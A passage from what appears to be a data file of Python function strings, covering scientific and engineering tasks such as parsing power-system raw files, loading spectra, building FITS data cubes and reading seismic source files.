num >= 3:\n if line[0:2] == '0 ' or line[0:3] == ' 0 ': # end of block\n b += 1\n continue\n elif line[0] is 'Q': # end of file\n break\n data = line.split(',')\n\n data = [to_number(item) for item in data]\n mdata.append(data)\n mline += 1\n if mline == nol[b]:\n if nol[b] == 1:\n mdata = mdata[0]\n raw[blocks[b]].append(mdata)\n mdata = []\n mline = 0\n fid.close()\n\n # add device elements params and add to PSAT formatted dictionary\n\n for data in raw['bus']:\n \"\"\"version 32:\n 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10\n ID, NAME, BasekV, Type, Area Zone Owner Va, Vm, latitude longitude\n \"\"\"\n idx = data[0]\n ty = data[3]\n angle = data[8]\n try:\n lat = data[9]\n except:\n # logging.warning('<No Coordinates in .raw file>')\n param = {'idx': idx,\n 'name': data[1],\n 'Vn': data[2],\n 'type': data[3],\n 'area': data[4],\n 'voltage': data[7],\n 'region': data[5],\n 'owner': data[6],\n 'angle': angle,\n }\n psatlist = [data[0], data[2], data[7], angle, data[4], data[5]]\n else:\n param = {'idx': idx,\n 'name': data[1],\n 'Vn': data[2],\n 'type': data[3],\n 'area': data[4],\n 'voltage': data[7],\n 'region': data[5],\n 'owner': data[6],\n 'angle': angle,\n 'latitude': data[9],\n 'longitude': data[10]\n }\n psatlist = [data[0], data[2], data[7], angle, data[4], data[5], data[9], data[10]]\n Settings.Bus.append(psatlist)\n Settings.BusNames.append(data[1])\n # Add BusSTORE Dictionary For Later Reference\n Settings.BusStore[idx] = param\n\n xcoord = [34.560040, 34.938385, 34.360040, 40.5152473, 40.3142473, 36.527401, 36.857401, 36.687401, 36.856401,\n 40.487041, 36.903901, 36.702901, 35.832561, 33.386047, 33.185047, 37.105571, 37.104154, 33.706718,\n 
37.103549, 36.703539, 37.103559, 36.703549, 36.033561, 35.631561, 36.032561, 35.732561, 36.525401,\n 36.857401, 49.869314, 50.969314, 51.979314, 52.481674, 54.973192, 56.276212, 41.734596, 34.551015,\n 34.652015, 34.537507, 34.587507, 34.157904, 33.714453, 33.762453, 39.548160, 39.496160, 34.313143,\n 34.545782, 34.380686, 34.111686, 34.137762, 34.118650, 34.158650, 33.918650, 33.718650, 34.018650,\n 34.018650, 34.018650, 34.018650, 34.018650, 34.312456, 34.315456, 34.243600, 34.566258, 34.565258,\n 46.064672, 46.565672, 45.514571, 45.606833, 45.806833, 44.890000, 45.596416, 45.295416, 45.891161,\n 47.954899, 46.511440, 45.913936, 45.713936, 46.669335, 47.954899, 47.624154, 43.784730, 44.482350,\n 42.006860, 42.934919, 42.731919, 43.013135, 44.068350, 43.558350, 42.438350, 42.938350, 44.068350,\n 43.558350, 43.048350, 42.638350, 44.068350, 43.558350, 43.048350, 42.638350, 43.620189, 39.120428,\n 40.398031, 35.216200, 35.215200, 36.202099, 39.777745, 39.539598, 37.052929, 35.403217, 35.352217,\n 36.807243, 39.567450, 40.807689, 40.806689, 41.008689, 39.555494, 37.954721, 38.406721, 38.906721,\n 38.656721]\n ycoord = [-109.277313, -110.303798, -109.777313, -107.546455, -107.546455, -108.325669, -108.654569, -108.486669,\n -108.325669, -107.185575, -111.390408, -111.390408, -111.448566, -112.860397, -112.659397, -108.243555,\n -108.441191, -112.322033, -111.590816, -111.190816, -111.190816, -111.590806, -111.648566, -111.248566,\n -111.249566, -111.647566, -108.655669, -108.323669, -122.150895, -122.150895, -122.150895, -121.61684,\n -121.924221, -122.21370, -108.790427, -117.568105, -117.538105, -118.607375, -118.658375, -118.280282,\n -118.146319, -118.096319, -112.52797, -112.72797, -118.690631, -118.389938, -118.478496, -118.478496,\n -118.299917, -118.095428, -118.095428, -118.095428, -118.095428, -118.195428, -118.395428, -117.995428,\n -117.795428, -117.995428, -118.481217, -118.891217, -118.391667, -117.166428, -117.368428, -106.60906,\n -106.80906, -122.681289, -121.114785, -122.113785, -123.29000, -121.312202, -121.114202, -106.612578,\n -118.997945, -112.88531, -120.692286, -120.693974, -119.571501, -120.997945, -122.219492, -118.77463,\n -121.019484, -121.316546, -114.419206, -114.419206, -120.956476, -120.79484, -120.93484, -121.216546,\n -121.156546, -121.215484, -121.135484, -121.255484, -121.175484, -121.013484, -120.733484, -121.053484,\n -120.973484, -118.865882, -122.073631, -122.263453, -120.847567, -120.900567, -120.129849, -122.142965,\n -122.262993, -121.021929, -119.450452, -119.450452, -121.779037, -122.276225, -122.135718, -121.935718,\n -121.935718, -121.24000, -121.18379, -121.10879, -121.27379, -121.23979]\n\n #for idx, line in enumerate(Settings.Bus):\n # line.extend([xcoord[idx], ycoord[idx]])\n\n maxV = 1.1\n minV = 0.9\n maxQ = 1\n minQ = 0\n convimp = 0\n status = 1\n loss = 1\n\n for data in raw['load']:\n \"\"\"version 32:\n 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11\n Bus, Id, Status, Area, Zone, PL(MW), QL (MW), IP, IQ, YP, YQ, OWNER\n \"\"\"\n\n busidx = data[0]\n vn = Settings.BusStore[busidx]['Vn']\n voltage = Settings.BusStore[busidx]['voltage']\n param = {'bus': busidx,\n 'Vn': vn,\n 'Sn': mva,\n 'p': (data[5] + data[7] * voltage + data[9] * voltage ** 2) / mva,\n 'q': (data[6] + data[8] * voltage - data[10] * voltage ** 2) / mva,\n 'owner': data[11],\n 'type': Settings.BusStore[busidx]['type'],\n 'voltage': voltage\n }\n\n psatlist = [busidx, mva, vn, param['p'], param['q'], maxV, minV, convimp, status]\n Settings.PQ.append(psatlist)\n \"\"\"CONFIRM THAT 
OTHER BUSES HAVE 0 P and 0 Q which are not added\"\"\"\n\n for data in raw['fshunt']:\n \"\"\"\n 0, 1, 2, 3, 4\n Bus, name, Status, g (MW), b (Mvar)\n \"\"\"\n busidx = data[0]\n vn = Settings.BusStore[busidx]['Vn']\n param = {'bus': busidx,\n 'Vn': vn,\n 'status': data[2],\n 'Sn': mva,\n 'g': data[3] / mva,\n 'b': data[4] / mva,\n }\n\n psatlist = [busidx, mva, vn, freq, param['g'], param['b'], param['status']]\n Settings.Shunt.append(psatlist)\n\n gen_idx = 0\n type = 6\n\n for data in raw['gen']:\n \"\"\"\n 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,10,11, 12, 13, 14, 15, 16,17,18,19\n I,ID,PG,QG,QT,QB,VS,IREG,MBASE,ZR,ZX,RT,XT,GTAP,STAT,RMPCT,PT,PB,O1,F1\n \"\"\"\n busidx = data[0]\n vn = Settings.BusStore[busidx]['Vn']\n gen_mva = data[8]\n gen_idx += 1\n status = data[14]\n leak = 0\n param = {'Sn': gen_mva,\n 'Vn': vn,\n 'u': status,\n 'idx': gen_idx,\n 'bus': busidx,\n 'pg': status * data[2] / mva,\n 'qg': status * data[3] / mva,\n 'qmax': data[4] / mva,\n 'qmin': data[5] / mva,\n 'v0': data[6],\n 'ra': data[9], # ra armature resistance\n 'xs': data[10], # xs synchronous reactance\n 'pmax': data[16] / mva,\n 'pmin': data[17] / mva,\n }\n\n if Settings.BusStore[busidx]['type'] == 3: #Check Bus Type for Slack\n refangle = 0\n refBus = 1\n PGuess = 1\n swlist = [busidx, gen_mva, vn, param['v0'], refangle, param['qmax'], param['qmin'],\n maxV, minV, PGuess, loss, refBus, status]\n SW = swlist\n Settings.SW.append(swlist)\n Settings.SWStore[busidx] = param\n Settings.SynStore[busidx] = param\n continue\n\n if busidx not in Settings.BusStore.keys():\n \"\"\" Need data from .dyr file. Create initial list, then append data from .dyr\"\"\"\n else:\n # psatlist = [busidx, gen_mva, vn, freq, type, leak, param['ra'],param['xs']]\n # Syn.append(psatlist)\n Settings.SynStore[busidx] = param\n pvlist = [busidx, gen_mva, vn, param['pg'], Settings.BusStore[busidx]['voltage'],\n param['qmax'], param['qmin'], maxV, minV, loss, status]\n Settings.PV.append(pvlist)\n\n\n for data in raw['branch']:\n \"\"\"\n I,J,ID,R,X,B,RATEA,RATEB,RATEC,GI,BI,GJ,BJ,ST,LEN,O1,F1,...,O4,F4\n \"\"\"\n param = {'bus1': data[0],\n 'bus2': data[1],\n 'id' : data[2],\n 'r': data[3],\n 'x': data[4],\n 'b': data[5],\n 'rate_a': data[6],\n 'rate_b': data[7],\n 'rate_c': data[8],\n 'Vn': Settings.BusStore[data[0]]['Vn'],\n 'Vn2': Settings.BusStore[data[1]]['Vn'],\n 'length': data[14],\n 'Ilim': EMPTY,\n 'Plim': EMPTY,\n 'Slim': EMPTY,\n 'status': data[13]\n }\n\n psatlist = [param['bus1'], param['bus2'], param['rate_c'], param['Vn'], freq, EMPTY,\n param['length'], param['r'], param['x'], param['b'], param['Ilim'], param['Plim'], EMPTY, EMPTY,\n param['Slim'], param['status']]\n Settings.Lineij.append([data[0], data[1], data[2]])\n Settings.Lineji.append([data[1], data[0], data[2]])\n Settings.LineOrd[param['bus1']].append(psatlist)\n Settings.branches += 1\n Settings.linecount += 1\n Settings.LineBusMatij[param['bus2']].append(Settings.branches)\n Settings.LineBusMatji[param['bus1']].append(Settings.branches)\n\n for data in raw['transf']:\n \"\"\"\n I,J,K,CKT,CW,CZ,CM,MAG1,MAG2,NMETR,'NAME',STAT,O1,F1,...,O4,F4\n R1-2,X1-2,SBASE1-2\n WINDV1,NOMV1,ANG1,RATA1,RATB1,RATC1,COD1,CONT1,RMA1,RMI1,VMA1,VMI1,NTP1,TAB1,CR1,CX1\n WINDV2,NOMV2\n \"\"\"\n if len(data[1]) < 5:\n ty = 2\n else:\n ty = 3\n if ty == 3:\n continue\n # raise NotImplementedError('Three-winding transformer not implemented')\n\n tap = data[2][0]\n phi = data[2][2]\n\n if tap == 1 and phi == 0:\n trasf = False\n else:\n trasf = True\n param = {'trasf': trasf,\n 'bus1': 
data[0][0],\n 'bus2': data[0][1],\n 'u': data[0][11],\n 'b': data[0][8],\n 'r': data[1][0],\n 'x': data[1][1],\n 'tap': tap,\n 'phi': phi,\n 'rate_a': data[2][3],\n 'Vn': Settings.BusStore[busidx]['Vn'],\n 'Vn2': Settings.BusStore[busidx]['Vn'],\n # 'length': data[?][?], FIND CORRECT INDEX\n 'Ilim': EMPTY,\n 'Plim': EMPTY,\n 'Slim': EMPTY,\n }\n psatlist = [param['bus1'], param['bus2'], param['rate_a'], param['Vn'], freq, EMPTY,\n EMPTY, param['r'], param['x'], param['b'], param['Ilim'], param['Plim'], EMPTY, EMPTY,\n param['Slim'], param['u']]\n\n Settings.LineOrd[param['bus1']].append(psatlist)\n Settings.linecount += 1\n Settings.transformers += 1\n # ADD Line Data(All Branch Types) to Sys Param Dict after .dyr Transformer Data Added\n # Re-Order Line Data for correct sequence\n for key in Settings.LineOrd:\n for item in Settings.LineOrd[key]:\n Settings.Line.append(item)\n\n for data in raw['area']:\n Settings.Areas.append(data[4])\n\n for data in raw['zone']:\n Settings.Regions.append(data[1])\n\n return retval", "def main(file):\n\n # Get the current working directory.\n here = os.getcwd()\n #Need the file_name to set globe, so that other functions can access to it.\n global file_name\n # Spite the Input into file_path and file_name.\n file_path = spilt_path(file)[0]\n file_name = spilt_path(file)[1]\n\n # Try to get into the file_path, if exist\n try:\n os.chdir(file_path)\n except IOError, e:\n print e\n\n # Now convert it\n convertFile(file_name)\n # going back to orgin folder\n os.chdir(here)\n return os.path.join(output_dir, file_name)", "def load_spectrum(inputfile):\n if inputfile.endswith(\"fits\"):\n wav, flux = spectrum_sdss_fits(inputfile)\n imodel = False\n inu = False\n\n else:\n f = open(inputfile, \"r\")\n # Read header\n try:\n nn = int(f.tell())\n f.readline()\n except BaseException:\n pass\n\n # Read first line\n f.readline()\n # Check format of second line\n test = f.readline()\n f.seek(0) # rewind to begining\n\n # Read data\n if (len(test.split()) == 10) or (len(test.split()) == 6): # test62\n wav, flux = spectrum_test62(f)\n imodel = True\n inu = True\n\n elif len(test.split(\",\")) == 2 or len(test.split(\",\")) == 4: # csv\n wav, flux = spectrum_csv(f)\n imodel = False\n inu = False\n\n elif len(test.split()) == 2: # tsv\n wav, flux = spectrum_tsv(f)\n imodel = False\n inu = False\n\n elif len(test.split()) == 3: # tsv with uncertainties\n wav, flux = spectrum_tsv3(f)\n imodel = False\n inu = False\n\n elif len(test.split()) == 5 or len(test.split()) == 7: # mics format\n wav, flux = spectrum_misc(f)\n imodel = False\n inu = False\n\n else:\n\n raise ValueError(f\"Unknown format for {inputfile}.\")\n\n f.close()\n\n return Spectrum(wav, flux, (imodel, inu))", "def view(filename):\n n, data, data_dB,sr,ch=inputwav(filename)\n t=np.linspace(0,n/sr,n)\n py.close()\n fig, (ax1) = py.subplots(nrows=1) \n ax1.plot(t[0:n:100],data[0:n:100],'k-',linewidth=1,label=filename)\n ax1.legend(loc=1)\n ax1.set_ylabel('Amplitude (Rel. 
Bit)')\n ax1.set_xlabel('Time (s)')", "def wave_create():\n return _u2i(_pigpio_command(_control, _PI_CMD_WVCRE, 0, 0))", "def generate_data(path=resource_filename('locals', 'data/fake/'), mag_range=(11.13,18)):\n # Get some random spectra\n try:\n files = glob.glob('/user/jfilippazzo/Models/ACES/default/*.fits')[::50]\n except:\n files = glob.glob('/Users/jfilippazzo/Documents/Modules/_DEPRECATED/limb_dark_jeff/limb/specint/*.fits')[::20]\n \n # Make a fake source catalog (with only essential columns for now)\n catpath = os.path.join(path,'fake_source_catalog.ecsv')\n ids = list(range(len(files)))\n coords = SkyCoord([89.7455]*len(ids), [-29.05744]*len(ids), unit='deg', frame='icrs')\n cat = at.QTable([ids,coords], names=('id','icrs_centroid'))\n cat.write(catpath)\n \n # Open the x1d file\n header = fits.getheader(resource_filename('locals', 'data/template_x1d.fits'))\n \n # Make Spectrum objects from models at R=150\n wavelength = np.arange(0.05,2.6,0.0001)[::66]*q.um\n \n # Normalize the spectra to a random F200W magnitude\n spectra = []\n f200w = Bandpass('NIRISS.F200W')\n f200w.wave_units = q.um\n for file in files:\n \n # Create Spectrum\n flux = fits.getdata(file)[-1][::66]*q.erg/q.s/q.cm**2/q.AA\n unc = flux/50.\n spec = Spectrum(wavelength, flux, unc)\n \n # Normalize to F200W\n mag = np.random.uniform(*mag_range)\n norm_spec = spec.renormalize(mag, f200w)\n spectra.append(norm_spec)\n \n # Make a separate x1d file and photometry file for each bandpass\n # containing data for each source\n for band in NIRISS_bands:\n \n try:\n \n # Get the Bandpass object\n bp = Bandpass(band)\n bp.wave_units = q.um\n \n # Make x1d file for spectra\n x1d_file = os.path.join(path,'{}_x1d.fits'.format(band))\n x1d_hdu = fits.HDUList(fits.PrimaryHDU(header=header))\n \n # Make csv file for photometry\n phot_file = os.path.join(path,'{}_phot.csv'.format(band))\n phot_data = at.Table(names=('id','band','magnitude','magnitude_unc'), dtype=(int,'S20',float,float))\n \n # Iterate over spectra\n for id,(f,spec) in enumerate(zip(files,spectra)):\n \n # Trim spectrum to bandpass for x1d file\n spec = Spectrum(*spec.spectrum, trim=[(0*q.um,bp.WavelengthMin*1E-4*q.um),(bp.WavelengthMax*1E-4*q.um,10*q.um)])\n \n # Calculate magnitude and add to photometry table\n mag, mag_unc = spec.synthetic_magnitude(bp, force=True)\n phot_data.add_row([id, band, mag, mag_unc])\n \n # Add source spectrum params for verification\n params = f.split('/')[-1].split('-')\n header['TEFF'] = int(params[0].replace('lte',''))\n header['LOGG'] = float(params[1][:4])\n header['FEH'] = float(params[-6][:-8].split('+')[-1])\n header['FILEPATH'] = f\n header['PUPIL'] = band\n\n # Put spectrum in x1d fits file\n data = fits.BinTableHDU(data=np.rec.array(list(zip(*spec.data)),\n formats='float32,float32,float32',\n names='WAVELENGTH,FLUX,ERROR'),\n header=header)\n data.name = 'EXTRACT1D'\n \n x1d_hdu.append(data)\n \n # Write the photometry file\n phot_data.write(phot_file, format='ascii.csv')\n del phot_data\n \n # Write the x1d file\n x1d_hdu.writeto(x1d_file, overwrite=True)\n del x1d_hdu\n \n except IOError:\n pass", "def convert(infile,arcsec_per_pixel=0.2,sigma_conv=1.,expansion_factor=5,writeout=None,overwrite=False,keep_units=False):\n \n PLATESCALE = 1.2120 # arcsec / mm\n rss = fits.open( infile )\n phdr = rss[1].header\n dhdr = rss[0].header\n data = rss[0].data\n \n conff=dm.read_fibers_extension(phdr)\n bundles_values=conff.bundles.keys()\n sky_bundles=[]\n for bundlei in bundles_values:\n if phdr[\"BUN%03d_T\" % 
bundlei]=='SKY':\n sky_bundles.append(bundlei)\n \n w0 = dhdr['CRVAL1'] # reference wavelength\n try : dw = dhdr['CRDELT1'] # wavelength step\n except : dw = dhdr['CDELT1'] # wavelength step\n wunit = dhdr['CUNIT1'] # wavelength unit\n wtype = 'WAVE' # type spectra\n\n # define the dimensions of the spaxel array \n Nx, Ny, x0, y0, dx, dy = getspaxdim( data,phdr,sky_bundles,expansion_factor=expansion_factor)\n\n nbin=int(round(float(arcsec_per_pixel)/float(dx)))\n\n\n Nw = dhdr['NAXIS1'] # number of wave. steps\n \n\n \n # initialize an empty 3-d cube (zero everywhere)\n cube = fits.PrimaryHDU()\n #cube.header=rss[0].header \n #cube.header.remove('CRPIX1') \n #cube.header.remove('CRVAL1') \n #cube.header.remove('CUNIT1') \n #cube.header.remove('CTYPE1') \n #cube.header.remove('CRPIX2') \n #cube.header.remove('CRVAL2') \n #cube.header.remove('CDELT2') \n #cube.header.remove('CTYPE2') \n cube.header.update(NAXIS=3)\n cube.header.update(NAXIS1=Nx)\n cube.header.update(NAXIS2=Ny)\n cube.header.update(NAXIS3=Nw)\n cube.header.update(CD1_1=-dx/3600.)\n cube.header.update(CD2_2=dy/3600.)\n cube.header.update(CD3_3=dw)\n cube.header.update(CRPIX1=0)\n cube.header.update(CRPIX2=0)\n cube.header.update(CRPIX3=0)\n cube.header.update(CRVAL1=x0)\n cube.header.update(CRVAL2=y0)\n cube.header.update(CRVAL3=w0)\n\n cube.header.update(CTYPE1='RA---DEG')\n cube.header.update(CTYPE2='DEC--DEG')\n cube.header.update(CTYPE3=wtype)\n cube.header.update(CUNIT3=wunit)\n\n cube.header.update(CD1_2=0)\n cube.header.update(CD1_3=0)\n cube.header.update(CD2_1=0)\n cube.header.update(CD2_3=0)\n cube.header.update(CD3_1=0)\n cube.header.update(CD3_2=0)\n\n\n cube.data = numpy.zeros( (Nw,Ny,Nx) )\n\n # extract each spectrum and place it\n # into the 3-d cube\n for ispec in range(len(data)): \n fib_str='{:3d}'.format(ispec+1)\n fib_str=fib_str.replace(' ','0') \n if not(phdr['FIB'+fib_str+'_B'] in sky_bundles):\n try:\n end_sp=phdr['FIB'+fib_str+'W2'] \n start_sp=phdr['FIB'+fib_str+'W1']\n except:\n if ('start_sp' in locals()):\n print('Warning! FIB'+fib_str+'W1 and W2 information missing in header. Assuming previous fiber wavelength coverage.') \n else: \n end_sp=Nw\n start_sp=1 \n print('Warning! FIB'+fib_str+'W1 and W2 information missing in header. 
Assuming default wavelength coverage.') \n \n if end_sp!=start_sp:\n spec = data[ispec][:]\n Nwspec = Nw \n \n xpos = (phdr['FIB'+fib_str+'_x']+5.)*PLATESCALE \n ypos = (phdr['FIB'+fib_str+'_y']+5.)*PLATESCALE\n ix = int( round((xpos - x0),3) / dx )\n iy = int( round((ypos - y0),3) / dy )\n \n lambda_arr=w0+dw*numpy.arange(0,Nwspec,1)\n \n if keep_units==True:\n for i in range( start_sp, min(end_sp,Nwspec) ):\n cube.data[i][iy][ix] = spec[i]##same units \n else:\n for i in range( start_sp, min(end_sp,Nwspec) ):\n cube.data[i][iy][ix] = spec[i]*3.00e-5/lambda_arr[i]**2 ## Jy to erg/s/cm**2/A \n else:\n end_sp=Nwspec \n print('1st step') \n sigma_conv_pix=sigma_conv/((dx*nbin)/expansion_factor) \n for i in range( start_sp, min(end_sp,Nwspec)):\n print(str(i)+'/'+str(Nwspec)+' spectral channels',end=\"\\r\")\n cube.data[i]=scipy.ndimage.filters.gaussian_filter(cube.data[i], sigma=sigma_conv_pix)\n \n \n cube_rebin = fits.PrimaryHDU()\n cube_rebin.header=rss[0].header \n cube_rebin.header.remove('CRPIX1') \n cube_rebin.header.remove('CRVAL1') \n cube_rebin.header.remove('CUNIT1') \n cube_rebin.header.remove('CTYPE1') \n cube_rebin.header.remove('CDELT1')\n cube_rebin.header.remove('CRPIX2') \n cube_rebin.header.remove('CRVAL2') \n #cube_rebin.header.remove('CUNIT2') \n cube_rebin.header.remove('CDELT2') \n cube_rebin.header.remove('CTYPE2') \n cube_rebin.header.update(NAXIS=3)\n cube_rebin.header.update(NAXIS1=Nx//nbin)\n cube_rebin.header.update(NAXIS2=Ny//nbin)\n cube_rebin.header.update(NAXIS3=Nw)\n cube_rebin.header.update(CD1_1=-dx*nbin/3600.)\n cube_rebin.header.update(CD2_2=dy*nbin/3600.)\n cube_rebin.header.update(CD3_3=dw)\n cube_rebin.header.update(CRPIX1=0)\n cube_rebin.header.update(CRPIX2=0)\n cube_rebin.header.update(CRPIX3=0)\n cube_rebin.header.update(CRVAL1=x0)\n cube_rebin.header.update(CRVAL2=y0)\n cube_rebin.header.update(CRVAL3=w0)\n \n cube_rebin.header.update(CTYPE1='RA---SIN')\n cube_rebin.header.update(CTYPE2='DEC--SIN')\n cube_rebin.header.update(CTYPE3=wtype)\n cube_rebin.header.update(CUNIT3=wunit)\n cube_rebin.header.update(CUNIT1='deg')\n cube_rebin.header.update(CUNIT2='deg')\n \n cube_rebin.header.update(CD1_2=0)\n cube_rebin.header.update(CD1_3=0)\n cube_rebin.header.update(CD2_1=0)\n cube_rebin.header.update(CD2_3=0)\n cube_rebin.header.update(CD3_1=0)\n cube_rebin.header.update(CD3_2=0)\n cube_rebin.verify('fix')\n if keep_units:\n cube_rebin.header.update(BUNIT= dhdr['BUNIT']) ##the rss one!!\n else:\n cube_rebin.header.update(BUNIT= 'erg/s/cm**2/Angstrom') \n\n\n\n \n cube_rebin.data = numpy.zeros( (Nw,Ny//nbin,Nx//nbin) )\n print('')\n print('2nd step')\n for i in range( 0, Nwspec) : \n shape=cube.data[i].shape \n print(str(i)+'/'+str(Nwspec)+' spectral channels',end=\"\\r\")\n for xi in numpy.arange(0,shape[0],nbin)[:-1]:\n for yj in numpy.arange(0,shape[1],nbin)[:-1]:\n pixel_ij=numpy.sum(cube.data[i][xi:xi+nbin,yj:yj+nbin]) \n cube_rebin.data[i][xi//nbin,yj//nbin]=pixel_ij \n if writeout !=None:\n cube_rebin.writeto(writeout,overwrite=overwrite)\n return( cube_rebin)", "def generate_vec_file(args, path_list, file_name):\n if args.vec != None:\n #If the user wants to create a vec file, so calls opencv to create it.\n command = \" \".join([\"opencv_createsamples -vec\", args.vec,\n \"-info\", os.path.join(path_list, file_name),\n \"-num\", str(args.num), \"-h\", str(args.height),\n \"-w\", str(args.width)])\n execute_commands([command])\n if args.out_img_folder == None:\n \"\"\"If the user don't want to save created samples,\n so deletes the entire 
folder\"\"\"\n rmtree(os.path.abspath(path_list))", "def from_srf_file(self, filename, normalize=False):\n with open(filename, \"rt\") as f:\n # go to POINTS block\n line = f.readline()\n while 'POINTS' not in line:\n line = f.readline()\n\n npoints = int(line.split()[1])\n sources = []\n\n for _ in np.arange(npoints):\n lon, lat, dep, stk, dip, area, tinit, dt = \\\n map(float, f.readline().split())\n rake, slip1, nt1, slip2, nt2, slip3, nt3 = \\\n map(float, f.readline().split())\n\n dep *= 1e3 # km > m\n area *= 1e-4 # cm^2 > m^2\n slip1 *= 1e-2 # cm > m\n slip2 *= 1e-2 # cm > m\n # slip3 *= 1e-2 # cm > m\n\n nt1, nt2, nt3 = map(int, (nt1, nt2, nt3))\n\n if nt1 > 0:\n line = f.readline()\n while len(line.split()) < nt1:\n line = line + f.readline()\n stf = np.array(line.split(), dtype=float)\n if normalize:\n stf /= np.trapz(stf, dx=dt)\n\n M0 = area * DEFAULT_MU * slip1\n\n sources.append(\n Source.from_strike_dip_rake(\n lat, lon, dep, stk, dip, rake, M0,\n time_shift=tinit, sliprate=stf, dt=dt))\n\n if nt2 > 0:\n line = f.readline()\n while len(line.split()) < nt2:\n line = line + f.readline()\n stf = np.array(line.split(), dtype=float)\n if normalize:\n stf /= np.trapz(stf, dx=dt)\n\n M0 = area * DEFAULT_MU * slip2\n\n sources.append(\n Source.from_strike_dip_rake(\n lat, lon, dep, stk, dip, rake, M0,\n time_shift=tinit, sliprate=stf, dt=dt))\n\n if nt3 > 0:\n raise NotImplementedError('Slip along u3 axis')\n\n return self(pointsources=sources)", "def SingleQubitRBT(qubit: qreg, seqFileDir, analyzedPulse: pulse, add_cals=True):\n\n # Original:\n # # Setup a pulse library\n # pulseLib = [AC(qubit, cliffNum) for cliffNum in range(24)]\n # pulseLib.append(analyzedPulse)\n # measBlock = MEAS(qubit)\n\n # seqs = []\n # for ct in range(10):\n # fileName = 'RBT_Seqs_fast_{0}_F1.txt'.format(ct+1)\n # tmpSeqs = []\n # with open(os.path.join(seqFileDir, fileName),'r') as FID:\n # fileReader = reader(FID)\n # for pulseSeqStr in fileReader:\n # seq = []\n # for pulseStr in pulseSeqStr:\n # seq.append(pulseLib[int(pulseStr)-1])\n # seq.append(measBlock)\n # tmpSeqs.append(seq)\n # seqs += tmpSeqs[:12]*12 + tmpSeqs[12:-12] + tmpSeqs[-12:]*12\n\n # seqsPerFile = 100\n # numFiles = len(seqs)//seqsPerFile\n\n # for ct in range(numFiles):\n # chunk = seqs[ct*seqsPerFile:(ct+1)*seqsPerFile]\n # # Tack on the calibration scalings\n # if add_cals:\n # numCals = 4\n # chunk += [[Id(qubit), measBlock]]*numCals + [[X(qubit), measBlock]]*numCals\n # fileNames = compile_to_hardware(chunk, 'RBT/RBT', suffix='_{0}'.format(ct+1))\n\n pulseSeqStrs = []\n for ct in range(10):\n fileName = 'RBT_Seqs_fast_{0}_F1.txt'.format(ct+1)\n tmpSeqs = []\n with open(os.path.join(seqFileDir, fileName),'r') as FID:\n fileReader = reader(FID)\n for pulseSeqStr in fileReader:\n tmpSeqs.append(pulseSeqStr)\n pulseSeqStrs = tmpSeqs[:12]*12 + tmpSeqs[12:-12] + tmpSeqs[-12:]*12\n\n numSeqs = len(pulseSeqStrs)\n seqsPerFile = 100\n numFiles = numSeqs//seqsPerFile\n numCals = 4\n\n for ct in range(numFiles):\n for s in range(seqsPerFile):\n init(qubit)\n seqStr = pulseSeqStrs[ct*seqsPerFile+s]\n getPulseSeq(qubit, seqStr)\n if add_cals:\n # Add numCals calibration scalings\n for _ in range(numCals):\n init(qubit)\n Id(qubit)\n MEAS(qubit)\n\n init(qubit)\n X(qubit)\n MEAS(qubit)", "def get_input(inputfile, ndim, radii):\n\n d = readdump(inputfile, ndim)\n d.read_onefile()\n results = []\n for n in range(d.SnapshotNumber):\n ParticleRadii = np.array(pd.Series(d.ParticleType[n]).map(radii))\n PositionRadii = 
np.column_stack((d.Positions[n], ParticleRadii))\n voroinput = np.column_stack((np.arange(d.ParticleNumber[n]) + 1, PositionRadii))\n results.append(voroinput)\n\n return (results, d.Boxbounds)", "def signalroisample(filename,obs):\n from samplingdist import readworkspace,readfile\n #f,w,obsdict,modeldict,databkgdict,datasigdict = readworkspace(filename)\n f,obsdict,modeldict,databkgdict,datasigdict = readfile(filename)\n if not obsdict.has_key(obs):\n raise RuntimeError(\"Observable '%s' not defined\" % obs)\n sd = ObservableSamplingProb(obsdict[obs])\n sd.setupmodel('bkg','negative_binomial_pdf')\n sd.setupmodel('sig','negative_binomial_sum_pdf')\n\n datasig = datasigdict['dvsig_'+obs]\n databkg = databkgdict['dvbkg_'+obs]\n sd.fitTo(datasig,'sig')\n sd.fitTo(databkg,'bkg')\n\n samplename = filename.split('_')[1]\n sd.plot(samplename,datasig,'sig',sample=samplename+'_sig')\n sd.plot(samplename,databkg,'bkg',sample=samplename+'_bkg')\n\n nfile = filename.split('_')[1]+'_bkgsig_'+obs+'_ws.root'\n sd.update('w',nfile,[datasig,databkg])", "def add_pixel_fn(filename: str, resample_name: str) -> None:\n\n header = \"\"\" <VRTRasterBand dataType=\"Byte\" band=\"1\" subClass=\"VRTDerivedRasterBand\">\"\"\"\n contents = \"\"\"\n <PixelFunctionType>{0}</PixelFunctionType>\n <PixelFunctionLanguage>Python</PixelFunctionLanguage>\n <PixelFunctionCode><![CDATA[{1}]]>\n </PixelFunctionCode>\"\"\"\n\n lines = open(filename, 'r').readlines()\n lines[3] = header # FIX ME: 3 is a hand constant\n lines.insert(4, contents.format(resample_name,\n get_resample(resample_name)))\n open(filename, 'w').write(\"\".join(lines))", "def dorv(visitfiles) :\n # last list elements has configuration variables in a tuple\n allvisit = visitfiles[0]\n load = visitfiles[1]\n field=visitfiles[-1][0]\n obj=visitfiles[-1][1].decode('UTF-8')\n clobber=visitfiles[-1][2]\n verbose=visitfiles[-1][3]\n tweak=visitfiles[-1][4]\n plot=visitfiles[-1][5]\n windows=visitfiles[-1][6]\n #rvrange=visitfiles[-1][7]\n if tweak: suffix='_tweak'\n else : suffix='_out'\n outdir = os.path.dirname(load.filename('Star',field=field,obj=obj))\n outdir = outdir.replace('/stars/','/rv/')\n\n if os.path.exists(outdir+'/'+obj+suffix+'.pkl') and not clobber:\n print(obj,' already done')\n fp=open(outdir+'/'+obj+suffix+'.pkl','rb')\n try: \n out=pickle.load(fp)\n fp.close()\n return out\n except: \n print('error loading: ', obj+suffix+'.pkl')\n pass\n\n speclist=[]\n pixelmask=bitmask.PixelBitMask()\n badval=pixelmask.badval()|pixelmask.getval('SIG_SKYLINE')|pixelmask.getval('LITTROW_GHOST')\n \n # if we have a significant number of low S/N visits, combine first using\n # barycentric correction only, use that to get an estimate of systemic\n # velocity, then do RV determination restricting RVs to within 50 km/s\n # of estimate. 
